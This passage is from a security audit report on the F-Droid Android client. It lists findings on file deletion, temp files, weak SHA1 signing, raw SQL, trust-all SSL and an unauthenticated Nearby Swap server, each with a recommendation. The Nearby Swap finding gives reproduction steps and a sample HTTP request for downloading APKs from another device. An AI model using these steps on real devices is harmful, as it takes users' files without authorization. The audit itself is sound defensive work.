157:     private void showAddRepo() {
        /*
         * If there is text in the clipboard, and it looks like a URL, use that.
         * Otherwise use "https://" as default repo string.
         */
        ClipboardCompat clipboard = ClipboardCompat.create(this);
        String text = clipboard.getText();
        String fingerprint = null;
        String username = null;
        String password = null;
        if (!TextUtils.isEmpty(text)) {
...
...
189:                 text = NewRepoConfig.sanitizeRepoUri(uri);
...
...
287:                 case DOESNT_EXIST:
                     prepareToCreateNewRepo(url, fp, username, password);
    </div></pre>
    <div style="margin-bottom: 5pt; line-height: 6mm;">This may be leveraged to change the status and fingerprint of an existing repo (line 653-658).</div>
    <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
        Utils.debugLog(TAG, "Enabling existing repo: " + url);
            Repo repo = RepoProvider.Helper.findByAddress(context, url);
            ContentValues values = new ContentValues(2);
            values.put(RepoTable.Cols.IN_USE, 1);
            values.put(RepoTable.Cols.FINGERPRINT, fingerprint);
            RepoProvider.Helper.update(context, repo, values);
    </div></pre>
    <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response from developer: </span> yeah, I guess this is true. The Add Repo prompt shows the URL it got from the clipboard. I can't think of another way to defend against this.
    </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Malicious redirect and interaction with a remote resource can potentially cause complete device compromise.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">If this feature is not needed, it should be removed.</div>
</div>
</div>
         <a name="f43-file-deleted-unconditionally"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.21</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-021 &#8212; File Deleted Unconditionally</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-021</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>File deletion</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">The application deletes specified file unconditionally if it exists.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">In zipio/ZipOutput.java, output file is unconditionally deleted if it exists.</div>
    <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
58: private void init( File ofile) throws IOException
    {
        if (ofile.exists()) ofile.delete();
        out = new FileOutputStream( ofile);
        if (getLogger().isDebugEnabled()) ZipListingHelper.listHeader( getLogger());

    }
    </div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Denial of service or system if a system critical file is deleted.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">On finding that the output file exists, the function should return error and let higher level code handle the error. Alternatively, the code should add a random suffix to the output file name if the specified file exists.</div>
</div>
</div>
         <a name="f44-secure-temp-file-usage-recommended"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.22</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-022 &#8212; Secure Temp File Usage Recommended</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-022</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Insecure temp file</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">nanohttpd.java uses insecure temp files</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">nanohttpd.java</span></div>
    <div style="margin-bottom: 5pt; line-height: 6mm;">nanohttpd uses java.io.tmpdir system property as the folder to create temp files. It is recommended that secure temp files should only be created within a subfolder of a public, systemwide temp directory.
    </div>
    <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">576:            tmpdir = System.getProperty("java.io.tmpdir");
    </div></pre>
    <div style="margin-bottom: 5pt; line-height: 6mm;">At several places in the code, the temp files in "tmpdir" are created with random string with NanoHTTPD- prefix, making the temp file usage somewhat secure.
    </div>
    <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">610:            file = File.createTempFile("NanoHTTPD-", "", new File(tempdir));

1297:         private String saveTmpFile(ByteBuffer b, int offset, int len) {
            String path = "";
            if (len &gt; 0) {
                FileOutputStream fileOutputStream = null;
                try {
                    TempFile tempFile = tempFileManager.createTempFile();
                    ByteBuffer src = b.duplicate();
                    fileOutputStream = new FileOutputStream(tempFile.getName());

1318:         private RandomAccessFile getTmpBucket() {
            try {
                TempFile tempFile = tempFileManager.createTempFile();
                return new RandomAccessFile(tempFile.getName(), "rw");
    </div></pre>
    <div style="margin-bottom: 5pt; line-height: 6mm;">The tempfile so created is not restricted in its permissions.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Information disclosure, data tampering leading to integrity compromise</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">FILE class in Java allows creation of subdirs, and setting specific permissions on created files. It is recommended to create the temp files within app specific subdirectory, for example "Fdroid" under global tmp folder. This subfolder can be created with restricted permissions for owner only, to create other temporary files with restricted permissions within this app-specific folder.
    </div>
</div>
</div>
         <a name="f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.23</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-023 &#8212; (fdroidclient) App Is Signed With `SHA1withRSA`, Known to Have Collision Issues</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-023</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Cryptography</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application was found to be signed with a <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">SHA1withRSA</span>, which is known to have collision issues.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">SHA1 with RSA has known collision issues, hence it is not recommended to be used for signing new apps.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Note: If you use SHA256, the app will no longer work on Android devices &lt; 4.3. This means that builds made with the new cert system will create APK files that may not install on some Android 4.0-4.2 devices.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Signer Certificate</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">[
[
  Version: V3
  Subject: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
  Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5

  Key:
  Validity: [From: Fri Jul 23 22:40:24 IST 2010,
               To: Tue Dec 08 22:40:24 IST 2037]
  Issuer: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
  SerialNumber: [    4c49cd00]

]
  Algorithm: [SHA1withRSA]
  Signature:
0000: 08 E4 EF 69 9E 98 07 67   7F F5 67 53 DA 73 EF B2  ...i...g..gS.s..

0010: 39 0D 5A E2 C1 7E 4D B6   91 D5 DF 7A 7B 60 FC 07  9.Z...M....z.`..

0020: 1A E5 09 C5 41 4B E7 D5   DA 74 DF 28 11 E8 3D 36  ....AK...t.(..=6

0030: 68 C4 A0 B1 AB C8 4B 9F   A7 D9 6B 4C DF 30 BB A6  h.....K...kL.0..

0040: 85 17 AD 2A 93 E2 33 B0   42 97 2A C0 55 3A 48 01  ...*..3.B.*.U:H.

0050: C9 EB E0 7B F5 7E BE 9A   3B 3D 6D 66 39 65 26 0E  ........;=mf9e&amp;.

0060: 50 F3 B8 F4 6D B0 53 17   61 E6 03 40 A2 BD DC 34  P...m.S.a..@...4

0070: 26 09 83 97 FD A5 40 44   A1 7E 52 44 54 9F 98 69  &amp;.....@D..RDT..i

0080: B4 60 CA 5E 6E 21 6B 6F   6A 2D B0 58 0B 48 0C A2  .`.^n!koj-.X.H..

0090: AF E6 EC 6B 46 EE DA CF   A4 AA 45 03 88 09 EC E0  ...kF.....E.....

00A0: C5 97 86 53 D6 C8 5F 67   8E 7F 5A 21 56 D1 BE DD  ...S.._g..Z!V...

00B0: 81 17 75 1E 64 A4 B0 DC   D1 40 F3 04 0B 02 18 21  ..u.d....@.....!

00C0: A8 D9 3A ED 8D 01 BA 36   DB 6C 82 37 22 11 FE D7  ..:....6.l.7"...

00D0: 14 D9 A3 26 07 03 8C DF   D5 65 BD 52 9F FC 63 72  ...&amp;.....e.R..cr

00E0: 12 AA A2 C2 24 EF 22 B6   03 EC CE FB 5B F1 E0 85  ....$.".....[...

00F0: C1 91 D4 B2 4F E7 42 B1   7A B3 F5 5D 4E 6F 05 EF  ....O.B.z..]No..


]</div></pre>

</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Signing an app with a weaker algorithm makes it easy for attackers to create a fake cert and sign a malicious app.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">It is recommended to update to a stronger signing key for this Android app. The old default RSA 1024-bit key is weak and officially deprecated.</div>
</div>
</div>
         <a name="f47--fdroidclient-raw-sql-query-executions"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.24</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-024 &#8212; (fdroidclient) Raw SQL Query Executions</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-024</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>SQL Injection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">App uses and executes raw SQL query. An untrusted user input in raw SQL queries can lead to SQL Injection attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application uses raw SQL query execution in below files:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div>org\fdroid\fdroid\data\AppProvider.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div>org\fdroid\fdroid\data\DBHelper.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div>org\fdroid\fdroid\data\InstalledAppProvider.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div>org\fdroid\fdroid\data\LoggingQuery.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div>org\fdroid\fdroid\data\TempApkProvider.java</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>&#8226;</div></td><td width="7.56">&nbsp;</td><td valign="top"><div>org\fdroid\fdroid\data\TempAppProvider.java</div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Example of raw SQL query execution:</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">DBHelper.java</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">sQLiteDatabase.rawQuery("UPDATE fdroid_app SET iconUrl = (  SELECT (fdroid_repo.address || CASE WHEN fdroid_repo.version &gt;= ? THEN ? ELSE ? END || fdroid_app.icon)   FROM fdroid_apk   JOIN fdroid_repo ON (fdroid_repo._id = fdroid_apk.repo)   WHERE fdroid_app.id = fdroid_apk.id AND fdroid_apk.vercode = fdroid_app.suggestedVercode ), iconUrlLarge = (  SELECT (fdroid_repo.address || CASE WHEN fdroid_repo.version &gt;= ? THEN ? ELSE ? END || fdroid_app.icon)   FROM fdroid_apk   JOIN fdroid_repo ON (fdroid_repo._id = fdroid_apk.repo)   WHERE fdroid_app.id = fdroid_apk.id AND fdroid_apk.vercode = fdroid_app.suggestedVercode)", new String[]{string4, string2, "/icons/", string4, string3, "/icons/"});
        DBHelper.clearRepoEtags(sQLiteDatabase);</div></pre>

</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Executing raw SQL queries with untrusted user input might lead to SQL injection attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">It is recommended to never use the unvalidated user input inside a SQL query and execute it. The best way to make sure adversaries will not be able to inject unsolicited SQL syntax into your queries is to avoid using SQLiteDatabase.rawQuery() instead opting for a parameterized statement.</div>
</div>
</div>
         <a name="f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.25</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-025 &#8212; (fdroid Client) Snooping in Between Clients in "Nearby Swap"</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-025</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Malicious Use of Feature</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The application's feature Nearby Swap, allows a third person to snoop into the communication. And download files from either of the two user's device, without their permission.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Follow steps below:</div>
<div style="margin-left: 0.2cm; margin-bottom: 5pt; line-height: 6mm; margin-bottom: 12pt;"><table width="100%"><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>1. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div>Install the app on an Android device.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>2. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div>Connect to a wifi network and chose the option Nearby Swap</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>3. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div>Select any app.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>4. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div>Now go to any computer on the same wifi network and scan for all local devices with port 8888. Or just open the URL shown on mobile device.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>5. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div>On the laptop, you will see the fdroid swap default page.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>6. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div>Now open the URL <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http:https://[mobile device IP]:8888/fdroid/repo/icons/</span>. This page will show the list of applications being shared by this device.</div></td></tr><tr style="line-height: 5.5mm; margin-bottom: 5pt;"><td valign="top" width="18.9"><div>7. </div></td><td width="7.56">&nbsp;</td><td valign="top"><div>If you want to download an apk shortcut file from this device, just modify the URL as <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http:https://[mobile device IP]:8888/fdroid/repo/[any_icon_name.apk]</span></div></td></tr></table></div>
<div style="margin-bottom: 5pt; line-height: 6mm;">NOTE: In order to do any of this, you don't need any authorization to be given by the mobile app user.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Request to download any apk</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">GET /fdroid/repo/com.amazon.mShop.android_4810.apk HTTP/1.1
User-Agent: F-Droid 1.0.3
Host: 192.168.57.33:8888
Connection: close
Accept-Encoding: gzip, deflate</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">HTTP/1.1 200 OK
Content-Type: application/vnd.android.package-archive
Date: Tue, 27 Mar 2018 12:36:08 GMT
ETag: bca3baa2
Content-Length: 320880
Accept-Ranges: bytes
Connection: keep-alive
Content-Length: 320880
....
[Redacted]
....</div></pre>

</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">It is possible to exploit the Nearby swap feature of fdroid application and access the Android device's application directory. This can also be used to download files from the device, without any authorization.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">The way the feature has been implemented is prone to different attacks. It is suggested to not directly open a web server and allow everyone to access. Some authentication should be applied.</div>
</div>
</div>
         <a name="f52--fdroid-client-insecure-implementation-of-ssl"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.26</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-026 &#8212; (fdroid Client) Insecure Implementation of SSL</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-026</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Transport Layer Security</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Trusting all the certificates or accepting self-signed certificates is a critical Security Hole. This application is vulnerable to MITM attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The application trusts and accepts any SSL certificate and self-signed certificate.
This allows an attacker to capture the application's traffic in a proxy and perform MITM attacks.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">The application's code in the file TlsOnlySocketFactory.java shows that the application trusts and accepts any SSL certificate.
It is possible to install an SSL certificate on a device and run the application to capture its traffic on the proxy.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">This vulnerability makes the application susceptible to man in the middle attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
A better security practice is to include an SSL certificate inside the application build.
Then check and trust only that certificate at runtime. This is known as SSL pinning.</div>
</div>
         <a name="f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.27</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-027 &#8212; (Privilege Extension) Mobile application package signed with weak algorithm `SHA1withRSA`</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-027</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Cryptography</div></td></tr><tr><td style="margin-left: 0; margin-right: 